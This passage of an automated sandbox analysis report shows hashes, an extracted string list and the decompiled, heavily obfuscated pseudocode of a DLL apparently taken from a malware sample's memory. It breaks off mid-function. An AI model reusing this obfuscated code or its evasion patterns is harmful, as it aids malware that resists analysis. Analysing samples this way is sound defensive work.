Opcode ID: 9fee5e40c5b386811e62a28aa39bd73519462d30de4c334bac801d5d2945ff92
Instruction ID: 77b189a561f0efebadae2b84e12eff25118ec35bb791a1777a205f46d0701581
Opcode Fuzzy Hash: 9fee5e40c5b386811e62a28aa39bd73519462d30de4c334bac801d5d2945ff92
Instruction Fuzzy Hash: 20D212715097818BE3B8CF25C58A6DFBBE1FB84344F10891DE5CA862A0DBB59949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 10016334, Relevance: 30.7, Strings: 24, Instructions: 660
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10016334(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32) {
				char _v4;
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				unsigned int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				intOrPtr _v312;
				char _v316;
				intOrPtr _t725;
				intOrPtr _t732;
				intOrPtr _t734;
				intOrPtr _t735;
				intOrPtr _t746;
				intOrPtr _t747;
				void* _t749;
				intOrPtr _t752;
				intOrPtr* _t755;
				char _t757;
				signed int _t767;
				void* _t779;
				void* _t819;
				intOrPtr _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				intOrPtr _t851;
				signed int _t852;
				intOrPtr _t853;
				char _t859;
				void* _t861;
				void* _t863;
				void* _t865;

				_t755 = _a32;
				_push(_t755);
				_push(_a28);
				_push(_a24);
				_v16 = __ecx;
				_push(_a20);
				_push(_a16);
				_push(_a12 & 0x0000ffff);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_a12 & 0x0000ffff);
				_v8 = 0x583ce9;
				_v4 = 0;
				_t861 =  &_v316 + 0x28;
				_v24 = 0;
				_t757 = 0;
				_v140 = 0xad16;
				_t859 = 0;
				_v140 = _v140 | 0x555fd697;
				_v140 = _v140 ^ 0x2f7787b8;
				_t852 = 0x25892389;
				_v140 = _v140 ^ 0x7a28782f;
				_v300 = 0x7eb5;
				_v300 = _v300 + 0xfffff63d;
				_v300 = _v300 + 0xffff0078;
				_v300 = _v300 | 0x4797881a;
				_v300 = _v300 ^ 0xfffffd69;
				_v196 = 0x78bf;
				_v20 = 0;
				_t835 = 0x18;
				_v196 = _v196 / _t835;
				_t836 = 0x71;
				_v196 = _v196 / _t836;
				_v196 = _v196 ^ 0x000000c3;
				_v232 = 0x1d52;
				_v232 = _v232 >> 2;
				_v232 = _v232 + 0xa5b0;
				_t837 = 0x42;
				_v316 = 0;
				_v232 = _v232 / _t837;
				_v232 = _v232 ^ 0x0000829f;
				_v272 = 0x1010;
				_v272 = _v272 + 0xa1d3;
				_v272 = _v272 * 0x4d;
				_v272 = _v272 >> 7;
				_v272 = _v272 ^ 0x00002b02;
				_v76 = 0xd02c;
				_v76 = _v76 << 0xb;
				_v76 = _v76 ^ 0x06c16000;
				_v112 = 0x3e7a;
				_v112 = _v112 << 0xf;
				_v112 = _v112 + 0x6fd2;
				_v112 = _v112 ^ 0x1f396fd2;
				_v248 = 0x6540;
				_v248 = _v248 | 0xabd80c30;
				_v248 = _v248 + 0x2f33;
				_v248 = _v248 ^ 0x5dee4f13;
				_v248 = _v248 ^ 0xf236d3b0;
				_v280 = 0x1dad;
				_v280 = _v280 + 0x750f;
				_v280 = _v280 + 0xffffd67c;
				_v280 = _v280 << 1;
				_v280 = _v280 ^ 0x0008d270;
				_v176 = 0x417e;
				_v176 = _v176 >> 0xe;
				_v176 = _v176 >> 5;
				_v176 = _v176 ^ 0x00000200;
				_v224 = 0xe381;
				_v224 = _v224 << 0xa;
				_v224 = _v224 >> 5;
				_v224 = _v224 | 0x19abac4a;
				_v224 = _v224 ^ 0x19bffd6a;
				_v44 = 0x8a1;
				_v44 = _v44 + 0xffff0079;
				_v44 = _v44 ^ 0x7fff091a;
				_v284 = 0x1ee0;
				_v284 = _v284 ^ 0x4b30d2e7;
				_t838 = 0x50;
				_v284 = _v284 * 0xf;
				_v284 = _v284 ^ 0x61762d3d;
				_v284 = _v284 ^ 0x06add954;
				_v32 = 0x6f09;
				_v32 = _v32 << 4;
				_v32 = _v32 ^ 0x0006f093;
				_v276 = 0x6d37;
				_v276 = _v276 | 0xbc9f258d;
				_v276 = _v276 / _t838;
				_v276 = _v276 << 0xb;
				_v276 = _v276 ^ 0xdcbe36a5;
				_v80 = 0x60dd;
				_v80 = _v80 + 0xd81c;
				_v80 = _v80 ^ 0x00015f59;
				_v260 = 0x684a;
				_v260 = _v260 >> 8;
				_v260 = _v260 ^ 0xb6528adf;
				_v260 = _v260 | 0x494b1842;
				_v260 = _v260 ^ 0xff5b9ae8;
				_v268 = 0xd38d;
				_v268 = _v268 * 0x3f;
				_v268 = _v268 ^ 0xb4057afc;
				_v268 = _v268 * 0x61;
				_v268 = _v268 ^ 0x46bd0f38;
				_v212 = 0x72c;
				_v212 = _v212 | 0xf1e32cea;
				_v212 = _v212 >> 4;
				_v212 = _v212 ^ 0x0f1e0789;
				_v72 = 0xb41c;
				_v72 = _v72 | 0x354d258a;
				_v72 = _v72 ^ 0x354d8014;
				_v124 = 0x3806;
				_v124 = _v124 * 0x25;
				_v124 = _v124 * 0xd;
				_v124 = _v124 ^ 0x00692bc5;
				_v132 = 0xfc29;
				_v132 = _v132 << 6;
				_v132 = _v132 >> 0xe;
				_v132 = _v132 ^ 0x000065a9;
				_v244 = 0xd58f;
				_v244 = _v244 + 0xffff2098;
				_v244 = _v244 + 0xffff7f58;
				_v244 = _v244 * 0x5d;
				_v244 = _v244 ^ 0xffcdc61c;
				_v252 = 0xe6a;
				_v252 = _v252 | 0x4f5f9b59;
				_v252 = _v252 ^ 0xd722ed3f;
				_v252 = _v252 ^ 0x478c9a98;
				_v252 = _v252 ^ 0xdff1ee91;
				_v56 = 0x4a89;
				_v56 = _v56 << 3;
				_v56 = _v56 ^ 0x00025781;
				_v64 = 0x976c;
				_v64 = _v64 << 4;
				_v64 = _v64 ^ 0x000949b8;
				_v88 = 0x34ae;
				_v88 = _v88 >> 8;
				_v88 = _v88 ^ 0x00003d4a;
				_v180 = 0xbf07;
				_t839 = 0x57;
				_v180 = _v180 * 0x5d;
				_v180 = _v180 | 0x9efaacd3;
				_v180 = _v180 ^ 0x9effad20;
				_v292 = 0xa8d8;
				_v292 = _v292 * 0x4b;
				_v292 = _v292 + 0xc172;
				_v292 = _v292 | 0x7fda690d;
				_v292 = _v292 ^ 0x7ffa31cb;
				_v96 = 0x5e54;
				_v96 = _v96 >> 6;
				_v96 = _v96 ^ 0x000034c1;
				_v188 = 0xf675;
				_v188 = _v188 ^ 0x7b1fe4ea;
				_v188 = _v188 / _t839;
				_v188 = _v188 ^ 0x016a786d;
				_v148 = 0x3e80;
				_v148 = _v148 | 0x1ab31455;
				_v148 = _v148 << 0x10;
				_v148 = _v148 ^ 0x3ed53818;
				_v156 = 0xa6a;
				_v156 = _v156 + 0xa0a9;
				_v156 = _v156 + 0xffff2736;
				_v156 = _v156 ^ 0xffffd082;
				_v164 = 0x310e;
				_v164 = _v164 << 0xe;
				_v164 = _v164 << 0xa;
				_v164 = _v164 ^ 0x0e000421;
				_v172 = 0x2936;
				_v172 = _v172 << 7;
				_v172 = _v172 + 0xf70e;
				_v172 = _v172 ^ 0x0015e7e6;
				_v256 = 0xa47e;
				_v256 = _v256 + 0x19c;
				_v256 = _v256 >> 0xe;
				_t840 = 0x4e;
				_v256 = _v256 / _t840;
				_v256 = _v256 ^ 0x00002858;
				_v128 = 0x994e;
				_v128 = _v128 >> 4;
				_v128 = _v128 << 0xe;
				_v128 = _v128 ^ 0x02654ef8;
				_v192 = 0xbea6;
				_v192 = _v192 ^ 0x5a1b9e43;
				_v192 = _v192 >> 6;
				_v192 = _v192 ^ 0x01683e99;
				_v296 = 0xdd28;
				_v296 = _v296 * 0x70;
				_v296 = _v296 + 0xafb5;
				_v296 = _v296 * 0x4a;
				_v296 = _v296 ^ 0x1c2ae579;
				_v152 = 0xdcbf;
				_v152 = _v152 * 0x5c;
				_v152 = _v152 >> 1;
				_v152 = _v152 ^ 0x0027ddb4;
				_v240 = 0xfade;
				_v240 = _v240 ^ 0x4d92b6c4;
				_v240 = _v240 ^ 0xcaafc244;
				_v240 = _v240 | 0x31e719ec;
				_v240 = _v240 ^ 0xb7ffb37a;
				_v264 = 0x28a;
				_v264 = _v264 ^ 0x4da1dd22;
				_t841 = 3;
				_v264 = _v264 / _t841;
				_t842 = 0x73;
				_v264 = _v264 * 6;
				_v264 = _v264 ^ 0x9b43e6ea;
				_v92 = 0x36b5;
				_v92 = _v92 | 0xba462576;
				_v92 = _v92 ^ 0xba467445;
				_v84 = 0xedf4;
				_v84 = _v84 / _t842;
				_v84 = _v84 ^ 0x00003c09;
				_v144 = 0x51e1;
				_v144 = _v144 << 0xe;
				_v144 = _v144 + 0xa393;
				_v144 = _v144 ^ 0x1478f45e;
				_v184 = 0x5a10;
				_v184 = _v184 >> 5;
				_v184 = _v184 | 0x1e1b91bd;
				_v184 = _v184 ^ 0x1e1ba669;
				_v288 = 0xf9e6;
				_t843 = 0x1e;
				_v288 = _v288 / _t843;
				_t844 = 3;
				_v288 = _v288 / _t844;
				_t845 = 0x45;
				_v288 = _v288 / _t845;
				_v288 = _v288 ^ 0x0000175b;
				_v216 = 0xd398;
				_v216 = _v216 + 0xffff1989;
				_v216 = _v216 + 0xffff1285;
				_v216 = _v216 ^ 0xfffef5bc;
				_v308 = 0x655b;
				_v308 = _v308 + 0xffff7e48;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 ^ 0xee581d4a;
				_v308 = _v308 ^ 0xee5bfd9c;
				_v136 = 0x84ab;
				_v136 = _v136 << 0x10;
				_t846 = 0x6f;
				_v136 = _v136 * 9;
				_v136 = _v136 ^ 0xaa037e91;
				_v68 = 0x8def;
				_v68 = _v68 >> 2;
				_v68 = _v68 ^ 0x000006e9;
				_v168 = 0x9e4a;
				_v168 = _v168 | 0xf830c118;
				_v168 = _v168 + 0xffffcf48;
				_v168 = _v168 ^ 0xf830fde4;
				_v36 = 0xa749;
				_v36 = _v36 + 0xffffd318;
				_v36 = _v36 ^ 0x00003bcc;
				_v60 = 0x69ce;
				_v60 = _v60 / _t846;
				_v60 = _v60 ^ 0x00004e5d;
				_v48 = 0x1c1d;
				_v48 = _v48 >> 7;
				_v48 = _v48 ^ 0x00007964;
				_v120 = 0x7eee;
				_t847 = 0x25;
				_v120 = _v120 * 0x2e;
				_v120 = _v120 | 0x4861a6de;
				_v120 = _v120 ^ 0x4877a989;
				_v304 = 0x21a6;
				_v304 = _v304 + 0x17af;
				_v304 = _v304 | 0xf7f5c8f1;
				_v304 = _v304 >> 3;
				_v304 = _v304 ^ 0x1efee7b8;
				_v100 = 0xc496;
				_v100 = _v100 + 0xffff73f8;
				_v100 = _v100 ^ 0x00006b63;
				_v200 = 0x6b07;
				_v200 = _v200 + 0xfffffdc4;
				_v200 = _v200 + 0xd3cd;
				_v200 = _v200 ^ 0x000172eb;
				_v40 = 0x13d4;
				_v40 = _v40 << 0x10;
				_v40 = _v40 ^ 0x13d417ed;
				_v108 = 0x6ec0;
				_v108 = _v108 / _t847;
				_v108 = _v108 << 3;
				_v108 = _v108 ^ 0x00005412;
				_v204 = 0xb775;
				_t848 = 0x4d;
				_v204 = _v204 / _t848;
				_t849 = 0x6c;
				_v204 = _v204 * 0x6a;
				_v204 = _v204 ^ 0x00009990;
				_v116 = 0x9fef;
				_v116 = _v116 / _t849;
				_v116 = _v116 + 0xca88;
				_v116 = _v116 ^ 0x0000935e;
				_v160 = 0x4217;
				_v160 = _v160 << 0x10;
				_v160 = _v160 | 0x795e81bc;
				_v160 = _v160 ^ 0x7b5feec4;
				_v228 = 0x15f5;
				_t850 = 0x3f;
				_v228 = _v228 / _t850;
				_v228 = _v228 + 0x27c1;
				_v228 = _v228 ^ 0x58c8dd5f;
				_v228 = _v228 ^ 0x58c8945c;
				_v236 = 0x2df4;
				_v236 = _v236 >> 8;
				_v236 = _v236 * 0x1c;
				_v236 = _v236 | 0x1dc13999;
				_v236 = _v236 ^ 0x1dc147a6;
				_v52 = 0xd70d;
				_v52 = _v52 ^ 0x1df81154;
				_v52 = _v52 ^ 0x1df8a692;
				_v104 = 0x3df6;
				_v104 = _v104 + 0xffff4325;
				_v104 = _v104 ^ 0xfffff2fb;
				_v220 = 0x2318;
				_v220 = _v220 ^ 0x0f1d2b51;
				_v220 = _v220 >> 0xd;
				_v220 = _v220 + 0xa910;
				_v220 = _v220 ^ 0x00012b73;
				_t851 = _v16;
				_v208 = 0x9e39;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 + 0xffffc634;
				_v208 = _v208 ^ 0xffff8828;
				while(1) {
					L1:
					_t819 = 0x247dbf53;
					while(1) {
						_t725 = _v312;
						while(1) {
							L3:
							_t865 = _t852 - _t819;
							if(_t865 > 0) {
								break;
							}
							if(_t865 == 0) {
								__eflags = _t755;
								if(__eflags == 0) {
									_t856 = _v20;
								} else {
									_push(_v288);
									_push(_v184);
									_push(_v144);
									_t747 = E1000B871(0x10001644, _v84, __eflags);
									_t856 = _t747;
									_t861 = _t861 + 0xc;
									_v20 = _t747;
								}
								_t851 = E10011115(_v44 | _v224 | _v176 | _v280 | _v248 | _v112 | _v76 | _v272 | _v232, _a16, _v44 | _v224 | _v176 | _v280 | _v248 | _v112 | _v76 | _v272 | _v232, _t856, _v216, _v308, _v136, _v68, _v168, _v312, _v36);
								_t767 = _v60;
								E1000717B(_t767, _v48, _v120, _t856, _v304);
								_t861 = _t861 - 0xc + 0x3c;
								__eflags = _t851;
								if(_t851 == 0) {
									L39:
									_t852 = 0x15d84100;
								} else {
									_push(_t767);
									_v12 = 1;
									_t746 = E1000F0B5(_v100, _v200, _t851,  &_v12, _t767, _v40);
									_t861 = _t861 + 0x14;
									_v12 = _t746;
									_t852 = 0x2004267a;
								}
								goto L17;
							} else {
								if(_t852 == 0x10833e14) {
									_t725 = E1000A47F(_v256, _v128, _v192, _t757, _a8, _v32, _t757, _v296, _v152, _v240, _v28, _t757, _a12, _v264, _v92);
									_t757 = _v316;
									_t861 = _t861 + 0x38;
									__eflags = _t725;
									_v312 = _t725;
									_t819 = 0x247dbf53;
									_t852 =  !=  ? 0x247dbf53 : 0x16fd57e4;
									continue;
								} else {
									if(_t852 == 0x15b84d59) {
										__eflags = E10002814(_t851, _a28);
										_t852 = 0x27bc2f7f;
										_t749 = 1;
										_t859 =  !=  ? _t749 : _t859;
										goto L17;
									} else {
										if(_t852 == 0x15d84100) {
											E1000422B(_v52, _t725, _v104);
											_t852 = 0x16fd57e4;
											goto L17;
										} else {
											if(_t852 == 0x16fd57e4) {
												E1000422B(_v220, _v28, _v208);
											} else {
												if(_t852 != 0x2004267a) {
													L41:
													__eflags = _t852 - 0x1153912b;
													if(_t852 != 0x1153912b) {
														_t725 = _v312;
														continue;
													}
												} else {
													if(_t755 == 0) {
														_t752 = 0;
														__eflags = 0;
													} else {
														_t752 =  *((intOrPtr*)(_t755 + 4));
													}
													if(_t755 == 0) {
														_t834 = 0;
														__eflags = 0;
													} else {
														_t834 =  *_t755;
													}
													E1001BB45(_v108, _t834, _v204, _t757, _t851, _v16, _v116, _v160, _t752);
													_t861 = _t861 + 0x1c;
													asm("sbb esi, esi");
													_t852 = (_t852 & 0x07b198ee) + 0x27bc2f7f;
													L17:
													_t757 = _v316;
													goto L1;
												}
											}
										}
									}
								}
							}
							L44:
							return _t859;
						}
						__eflags = _t852 - 0x25892389;
						if(_t852 == 0x25892389) {
							_t852 = 0x28dd5313;
							goto L41;
						} else {
							__eflags = _t852 - 0x27bc2f7f;
							if(_t852 == 0x27bc2f7f) {
								E1000422B(_v228, _t851, _v236);
								goto L39;
							} else {
								__eflags = _t852 - 0x28dd5313;
								if(_t852 == 0x28dd5313) {
									_v24 = 0x200;
									_t853 = E1000A0AD(0x200, _t819);
									_t779 = 0x200;
									__eflags = _t853;
									if(_t853 != 0) {
										_t732 = E10006717(_t853,  &_v24, _v260, _v268);
										_t863 = _t861 + 0xc;
										__eflags = _t732;
										if(_t732 == 0) {
											_push(_t853);
											_push(_t779);
											_t734 = E1001CB58(_v72, _v124, _v132, _v140, _t779);
											_t863 = _t863 + 0x18;
											_v316 = _t734;
										}
										E100033F4(_v244, _v252, _v56, _v64, _t853);
										_t861 = _t863 + 0xc;
									}
									_t852 = 0x28e249b5;
									goto L17;
								} else {
									__eflags = _t852 - 0x28e249b5;
									if(_t852 == 0x28e249b5) {
										_push(_t757);
										_push(_t757);
										_t735 = E1000A3B5(_t757, _v88, _v180, _v284, _v292, _v96, _t757, _v188);
										__eflags = _t735;
										_v28 = _t735;
										_t852 =  !=  ? 0x10833e14 : 0x1153912b;
										E100033F4(_v148, _v156, _v164, _v172, _v316);
										_t757 = _v316;
										_t861 = _t861 + 0x2c;
										_t819 = 0x247dbf53;
										goto L41;
									} else {
										__eflags = _t852 - 0x2f6dc86d;
										if(__eflags != 0) {
											goto L41;
										} else {
											__eflags = E10010EAE(_t851, _v300, __eflags) - _v196;
											_t852 =  ==  ? 0x15b84d59 : 0x27bc2f7f;
											goto L17;
										}
									}
								}
							}
						}
						goto L44;
					}
				}
			}

0x10016342
0x1001634c
0x1001634d
0x10016357
0x1001635e
0x10016365
0x1001636c
0x10016373
0x10016374
0x1001637b
0x10016382
0x10016383
0x10016384
0x10016389
0x10016396
0x1001639d
0x100163a0
0x100163a7
0x100163a9
0x100163b4
0x100163b6
0x100163c3
0x100163ce
0x100163d3
0x100163de
0x100163e6
0x100163ee
0x100163f6
0x100163fe
0x10016406
0x10016411
0x10016421
0x10016426
0x10016436
0x1001643b
0x10016444
0x1001644f
0x10016457
0x1001645c
0x10016468
0x1001646b
0x1001646f
0x10016473
0x1001647b
0x10016483
0x10016490
0x10016494
0x10016499
0x100164a1
0x100164ac
0x100164b4
0x100164bf
0x100164ca
0x100164d2
0x100164dd
0x100164e8
0x100164f0
0x100164f8
0x10016500
0x10016508
0x10016510
0x10016518
0x10016522
0x1001652a
0x1001652e
0x10016536
0x10016541
0x10016549
0x10016551
0x1001655c
0x10016564
0x10016569
0x1001656e
0x10016576
0x1001657e
0x10016589
0x10016594
0x1001659f
0x100165a7
0x100165b6
0x100165b7
0x100165bb
0x100165c3
0x100165cb
0x100165d6
0x100165de
0x100165e9
0x100165f1
0x100165ff
0x10016603
0x10016608
0x10016610
0x1001661b
0x10016626
0x10016631
0x10016639
0x1001663e
0x10016646
0x1001664e
0x10016656
0x10016663
0x10016667
0x10016674
0x10016678
0x10016680
0x10016688
0x10016690
0x10016695
0x1001669d
0x100166a8
0x100166b3
0x100166be
0x100166d1
0x100166e0
0x100166e7
0x100166f2
0x100166fd
0x10016705
0x1001670d
0x10016718
0x10016720
0x10016728
0x10016735
0x10016739
0x10016741
0x10016749
0x10016751
0x10016759
0x10016761
0x10016769
0x10016774
0x1001677c
0x10016787
0x10016794
0x1001679c
0x100167a7
0x100167b2
0x100167ba
0x100167c5
0x100167da
0x100167dd
0x100167e4
0x100167ef
0x100167fa
0x10016807
0x1001680b
0x10016813
0x1001681b
0x10016823
0x1001682e
0x10016836
0x10016841
0x1001684c
0x10016862
0x10016869
0x10016874
0x1001687f
0x1001688a
0x10016892
0x1001689d
0x100168a8
0x100168b3
0x100168be
0x100168c9
0x100168d4
0x100168dc
0x100168e4
0x100168ef
0x100168fa
0x10016902
0x1001690d
0x10016918
0x10016920
0x10016928
0x10016931
0x10016934
0x10016938
0x10016940
0x1001694b
0x10016953
0x1001695b
0x10016966
0x10016971
0x1001697c
0x10016984
0x1001698f
0x1001699c
0x100169a0
0x100169ad
0x100169b1
0x100169b9
0x100169cc
0x100169d3
0x100169da
0x100169e5
0x100169ed
0x100169f5
0x100169fd
0x10016a05
0x10016a0d
0x10016a15
0x10016a25
0x10016a2a
0x10016a35
0x10016a38
0x10016a3c
0x10016a44
0x10016a4f
0x10016a5a
0x10016a65
0x10016a7b
0x10016a82
0x10016a8d
0x10016a98
0x10016aa0
0x10016aab
0x10016ab6
0x10016ac1
0x10016ac9
0x10016ad4
0x10016adf
0x10016aeb
0x10016af0
0x10016afa
0x10016aff
0x10016b09
0x10016b0e
0x10016b14
0x10016b1c
0x10016b24
0x10016b2c
0x10016b34
0x10016b3c
0x10016b44
0x10016b4c
0x10016b51
0x10016b59
0x10016b61
0x10016b6c
0x10016b7c
0x10016b7d
0x10016b84
0x10016b8f
0x10016b9a
0x10016ba2
0x10016bad
0x10016bb8
0x10016bc3
0x10016bce
0x10016bd9
0x10016be4
0x10016bef
0x10016bfa
0x10016c0e
0x10016c15
0x10016c20
0x10016c2d
0x10016c35
0x10016c40
0x10016c55
0x10016c58
0x10016c5f
0x10016c6a
0x10016c75
0x10016c7d
0x10016c85
0x10016c8d
0x10016c92
0x10016c9a
0x10016ca5
0x10016cb0
0x10016cbb
0x10016cc6
0x10016cd1
0x10016cdc
0x10016ce7
0x10016cf2
0x10016cfa
0x10016d05
0x10016d1b
0x10016d22
0x10016d2a
0x10016d35
0x10016d47
0x10016d4c
0x10016d5d
0x10016d60
0x10016d67
0x10016d72
0x10016d88
0x10016d8f
0x10016d9a
0x10016da5
0x10016db0
0x10016db8
0x10016dc3
0x10016dce
0x10016dda
0x10016ddd
0x10016de1
0x10016de9
0x10016df1
0x10016df9
0x10016e01
0x10016e0b
0x10016e0f
0x10016e17
0x10016e1f
0x10016e2a
0x10016e35
0x10016e40
0x10016e4b
0x10016e56
0x10016e61
0x10016e69
0x10016e71
0x10016e76
0x10016e7e
0x10016e86
0x10016e8d
0x10016e95
0x10016e9a
0x10016ea2
0x10016eaa
0x10016eaa
0x10016eaa
0x10016eaf
0x10016eaf
0x10016eb3
0x10016eb3
0x10016eb3
0x10016eb5
0x00000000
0x00000000
0x10016ebb
0x10017001
0x10017003
0x10017036
0x10017005
0x10017005
0x1001700e
0x10017015
0x10017023
0x10017028
0x1001702a
0x1001702d
0x1001702d
0x100170ad
0x100170be
0x100170c5
0x100170ca
0x100170cd
0x100170cf
0x1001729c
0x1001729c
0x100170d5
0x100170d5
0x100170ef
0x100170ff
0x10017104
0x10017107
0x1001710e
0x1001710e
0x00000000
0x10016ec1
0x10016ec7
0x10016fdd
0x10016fe2
0x10016fe6
0x10016fe9
0x10016feb
0x10016ff4
0x10016ff9
0x00000000
0x10016ecd
0x10016ed3
0x10016f80
0x10016f82
0x10016f89
0x10016f8a
0x00000000
0x10016ed9
0x10016edf
0x10016f65
0x10016f6b
0x00000000
0x10016ee1
0x10016ee7
0x100172c7
0x10016eed
0x10016ef3
0x100172ab
0x100172ab
0x100172b1
0x10016eaf
0x00000000
0x10016eaf
0x10016ef9
0x10016efb
0x10016f02
0x10016f02
0x10016efd
0x10016efd
0x10016efd
0x10016f06
0x10016f0c
0x10016f0c
0x10016f08
0x10016f08
0x10016f08
0x10016f34
0x10016f39
0x10016f3e
0x10016f46
0x10016f4c
0x10016f4c
0x00000000
0x10016f4c
0x10016ef3
0x10016ee7
0x10016edf
0x10016ed3
0x10016ec7
0x100172cf
0x100172d9
0x100172d9
0x10017118
0x1001711e
0x100172a6
0x00000000
0x10017124
0x10017124
0x1001712a
0x10017296
0x00000000
0x10017130
0x10017130
0x10017136
0x10017200
0x1001720c
0x1001720e
0x1001720f
0x10017211
0x10017225
0x1001722a
0x1001722d
0x1001722f
0x10017231
0x10017232
0x10017257
0x1001725c
0x1001725f
0x1001725f
0x1001727a
0x1001727f
0x1001727f
0x10017282
0x00000000
0x1001713c
0x1001713c
0x10017142
0x10017176
0x10017177
0x1001719d
0x100171a2
0x100171a4
0x100171b5
0x100171d9
0x100171de
0x100171e2
0x100171e5
0x00000000
0x10017144
0x10017144
0x1001714a
0x00000000
0x10017150
0x10017167
0x1001716e
0x00000000
0x1001716e
0x1001714a
0x10017142
0x10017136
0x1001712a
0x00000000
0x1001711e
0x10016eaf

Strings

~A, xrefs: 10016536
o, xrefs: 100165CB
j, xrefs: 1001689D
3/, xrefs: 100164F8
]N, xrefs: 10016C15
dy, xrefs: 10016C35
~, xrefs: 10016C40
<X, xrefs: 10016389
ck, xrefs: 10016CB0
J=, xrefs: 100167BA
y, xrefs: 10016589
){, xrefs: 10017009
X(, xrefs: 10016938
T^, xrefs: 10016823
6), xrefs: 100168EF
/x(z, xrefs: 100163D3
x, xrefs: 100163EE
z>, xrefs: 100164BF
<, xrefs: 10016A82
7m, xrefs: 100165E9
[e, xrefs: 10016B3C
Q, xrefs: 10016A8D
=-va, xrefs: 100165BB
Jh, xrefs: 10016631

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: <$o$){$/x(z$3/$6)$7m$=-va$J=$Jh$T^$X($[e$]N$ck$dy$j$x$y$z>$~A$<X$Q$~
API String ID: 0-357131844
Opcode ID: 39ce330e2643c91d647e67454946d1288a49c9bdc3fcad5edd7d861d2f9e0310
Instruction ID: 42deb625c151f31f63412f66aefc4542c1c3e57a74a07c856b9dc6f09a5a038e
Opcode Fuzzy Hash: 39ce330e2643c91d647e67454946d1288a49c9bdc3fcad5edd7d861d2f9e0310
Instruction Fuzzy Hash: 2172F0715083819BE3B8CF65C84AB8FBBE1FBC5304F10891DE5DA8A2A0D7B58945CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1000BEBD, Relevance: 29.5, Strings: 23, Instructions: 784
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E1000BEBD(intOrPtr __ecx, intOrPtr* __edx) {
				void* __edi;
				void* _t780;
				intOrPtr _t836;
				void* _t842;
				void* _t865;
				void* _t866;
				intOrPtr _t871;
				short _t887;
				signed int _t888;
				signed int _t889;
				signed int _t890;
				signed int _t891;
				signed int _t892;
				signed int _t893;
				signed int _t894;
				signed int _t895;
				signed int _t896;
				signed int _t897;
				signed int _t898;
				signed int _t899;
				signed int _t900;
				signed int _t901;
				signed int _t902;
				signed int _t903;
				signed int _t904;
				signed int _t905;
				signed int _t906;
				intOrPtr _t907;
				void* _t911;
				signed int _t921;
				signed int _t923;
				signed int _t926;
				intOrPtr _t938;
				intOrPtr _t939;
				signed int _t945;
				signed int _t947;
				signed int _t1001;
				intOrPtr* _t1010;
				short* _t1012;
				short* _t1013;
				intOrPtr _t1014;
				signed int _t1020;
				signed int _t1021;
				intOrPtr _t1023;
				void* _t1024;
				void* _t1025;
				void* _t1026;
				void* _t1029;
				void* _t1030;
				void* _t1031;
				void* _t1033;
				void* _t1034;

				_push( *((intOrPtr*)(_t1024 + 0xca4)));
				_t1010 = __edx;
				_t1014 = __ecx;
				_push( *((intOrPtr*)(_t1024 + 0xca4)));
				 *((intOrPtr*)(_t1024 + 0x164)) = __edx;
				_push( *((intOrPtr*)(_t1024 + 0xca4)));
				 *((intOrPtr*)(_t1024 + 0x15c)) = __ecx;
				_push( *((intOrPtr*)(_t1024 + 0xca4)));
				_push( *((intOrPtr*)(_t1024 + 0xca4)));
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t780);
				 *((intOrPtr*)(_t1024 + 0xd0)) = 0x4a25;
				_t1025 = _t1024 + 0x1c;
				 *(_t1025 + 0xb4) =  *(_t1025 + 0xb4) | 0xd188de58;
				 *(_t1025 + 0xb4) =  *(_t1025 + 0xb4) ^ 0x63b06175;
				_t1021 = 0;
				 *(_t1025 + 0xb4) =  *(_t1025 + 0xb4) ^ 0xb238a83d;
				_t911 = 0x1e9f048b;
				 *(_t1025 + 0xd4) = 0xe5d7;
				 *(_t1025 + 0xd4) =  *(_t1025 + 0xd4) | 0x5ea0c49f;
				 *(_t1025 + 0xd4) =  *(_t1025 + 0xd4) + 0xffffbd1c;
				 *(_t1025 + 0xd4) =  *(_t1025 + 0xd4) ^ 0x5ea0b989;
				 *(_t1025 + 0xbc) = 0x468c;
